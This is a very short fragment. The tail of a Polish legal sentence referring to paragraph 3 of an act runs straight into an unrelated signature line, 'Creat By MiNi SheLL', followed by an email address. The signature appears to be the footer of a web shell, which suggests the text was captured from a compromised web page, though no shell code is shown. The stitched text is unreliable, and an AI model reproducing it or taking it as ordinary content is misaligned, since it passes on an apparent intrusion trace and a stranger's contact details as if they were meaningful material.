ust. 3 wspomnianej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com